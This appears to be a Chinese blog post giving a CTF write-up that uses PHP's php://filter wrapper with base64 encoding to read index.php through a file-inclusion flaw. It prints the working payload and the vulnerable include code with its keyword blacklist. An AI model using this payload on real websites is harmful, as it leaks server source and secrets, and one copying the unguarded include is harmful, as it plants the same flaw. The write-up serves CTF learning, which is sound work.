通过php_filter获取flag

最新推荐文章于 2023-02-09 13:51:21 发布
最新推荐文章于 2023-02-09 13:51:21 发布
阅读量4.8k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013622866/article/details/105503151
版权

php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

名称描述
resource=<要过滤的数据流>这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表>该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表>该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
<;两个链的筛选列表>任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

使用BASE64获取源码

使用bugku平台的一道题目

访问题目环境

环境地址

  • 点击click me?no,页面跳转到test5,但是地址栏得链接却变成了http://123.206.87.240:8005/post/index.php?file=show.php

  • 因为题目说flag在index中,所以尝试使用php://filter构造payload:php://filter/read=convert.base64-encode/resource=index.php

  • 将得到的数据进行BASE64解码

<html>
    <title>Bugku-ctf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>
  • 得到flagflag:flag{edulcni_elif_lacol_si_siht}
菜鹌鹑
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php preg_filter执行一个正则表达式搜索和替换
10-28
preg_filter()等价于preg_replace() 除了它仅仅返回(可能经过转化)与目标匹配的结果. 这个函数怎样工作的更详细信息请阅读 preg_replace()文档
imu_filter_madgwick_IMU滤波_filter_imu_filter_madgwick_IMU_IMU滤波_源
09-29
ros环境下,将读取的imu数据进行滤波处理,排除干扰误差
教你在header中隐藏php的版本信息
12-19
前言 在php渲染的网页header信息中,会包含php的版本号信息,比如: X-Powered-by: php/5.3.3,这有些不安全,有些黑客可能采用扫描的方式,批量寻找低版本的php服务器,利用php漏洞(比如hash冲突)来攻击服务器。 php.ini中有一个选项可以控制是否暴露这个信息,那就是: expose_php = On 默认值是On,改成Off之后,就不会显示php版本信息啦。 或者在php-fpm的pool配置文件中设置: php_admin_flag[expose_php] = off 总结 以上就是如何在header信息中隐藏php的版本信息的全部内容,希望本
PHP filter_var() 函数 Filter 函数
10-28
PHP 过滤器用于对来自非安全来源的数据(比如用户输入)进行验证和过滤
php array_filter除去数组中的空字符元素
10-28
php array_filter除去数组中的空字符元素,需要的朋友可以参考下。
文件包含漏洞之3PHP伪协议实战
ISNS的博客
04-03 2058
一、通过php_filter获取flag 1.php://filter介绍 1.定义: 2.举例说明: (1)直接读取数据流: (2)采用某种方式读取数据流,如果有两种及以上的读取方式,中间用 | 管道符隔开: (3)写入数据流: 2.CTF实战 平台:BugkuCTF 题目:flag在index里 链接:http://123.206.87.240:8005/post/ 1.点进去看到UR...
Web攻防--PHP特性&CTF考点
weixin_68243135的博客
11-15 1112
Web攻防--PHP语言特性--函数缺陷
PHPINFO
m0_65849838的博客
04-22 516
前言 目录 一.开启题目 二.寻找flag 三.解开题目 实操 一.开启题目 二.寻找flag 开启题目后会得到一个flag表 Ctrl+f输入flag进行搜索,找到flag 三.解开题目
php反序列化
n1ght的博客
11-30 700
php反序列化,和php的session反序列化,php原生类
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1174
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
phpfilter_input函数用法分析
10-25
主要介绍了phpfilter_input函数用法,实例分析了采用filter_input函数过滤各种外部输入的方法,对于PHP程序设计来说具有不错的参考借鉴价值,需要的朋友可以参考下
php-MD5漏洞
cainiao17441898的博客
05-17 447
前言 PHP在处理哈希字符串时,会利用”!=”或””来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 $_SERVER[‘REQUEST_URI’]:会获取URL地址 strstr — 查找字符串的首次出现,返回该字符串及后面剩余部分 parse_str() 函数把查询字符串解析到变量中 substr() 方法可在字符串中抽取从 start 下标开始的指定数目的字符,语法:stringObj
PHP反序列化漏洞之pop链2
weixin_60719780的博客
02-09 406
但是如果想注入恶意payload,还需要对$test的值进行覆盖,题目中已经给出了序列化链,很明显是对类A的$test变量进行覆盖,将POST接收的phpin佛()值覆盖所定义的值,这里也可以传入一句话木马等,利用我们的eval危险函数(任意命令执行)进行执行。在执行unserialize()方法时会触发__wakeup()方法执行,将传入的字符串反序列化后,会替换掉test类里面$test变量的值,将php探针写入flag.php文件中,并通过下面的require引用,导致命令执行。
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
热门推荐
morrino的博客
04-21 2万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
信息安全 php获取flag,hack - PHP的信息安全(入侵获取$flag)的题目【Q1】
weixin_36487445的博客
03-20 459
地址:http://202.120.7.133:8888/collision.php正在参加ISG比赛,额,反正也是得奖无望了,不过作为一名PHPer,喵的我真心感觉这代码没问题啊。。。求大神解惑。如何获取$flag。。。回复内容:地址:http://202.120.7.133:8888/collision.php正在参加ISG比赛,额,反正也是得奖无望了,不过作为一名PHPer,喵的我真心感觉这...
从一道简单题对php反序列化与命令执行的再认识——绿盟杯2021 flag在哪里
Mrs_H的博客
10-24 487
前言 最近做了很多比赛的题目,而且都是我认为学的不错的PHP反序列化题目。但结果却是被暴打,现在新颖的题目类型,以及利用方法是都是我之前没有学到的。有些本应该会的题目也会因为粗心大意没有细心去解决问题。说多了,还是自己太菜了。咱们接下来上正菜。 正文 (以下的解题思路来自于末初大佬) 下面是题目的源代码 <?php error_reporting(0); <?php error_reporting(0); class begin{ public $file; public $mo
ctf php 读取flag,ctf题:pinstore获取flag
weixin_42304618的博客
03-11 1756
首先先用jadx反编译出源代码,可以看到目录结构 从这里就可以知道我们只需查看pinlock.ctf.pinlock.com.pinstore目录下的代码即可先从MainActivity看起 从源代码我们可以知道pinFormDB是数据库中存储的密码、hashOfEnteredPin属于我们输入的密码加密后的密文,在这里我们可以修改if的判断条件接下来通过apktool工具对apk文件进行反编译得...
CTF学习日记(2)
NUC_zlt的博客
11-01 1148
CTF学习日记第二次总结
php array_filter
最新发布
08-31
`array_filter()` 是 PHP 中的一个数组函数,它用于过滤数组中的元素,并返回一个新的数组。它接受两个参数:要过滤的数组和一个回调函数。 回调函数被用来定义过滤条件。当回调函数返回 `true` 时,当前元素将被包含在结果数组中,否则将被排除。 下面是一个示例: ```php $numbers = [1, 2, 3, 4, 5]; $evenNumbers = array_filter($numbers, function($value) { return $value % 2 == 0; }); print_r($evenNumbers); // 输出 [2, 4] ``` 在上面的例子中,我们使用 `array_filter()` 过滤了 `$numbers` 数组中的偶数。回调函数检查每个元素是否能被 2 整除,如果可以,则保留该元素,否则将其排除。最后,只有 `[2, 4]` 这两个偶数被保留下来。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值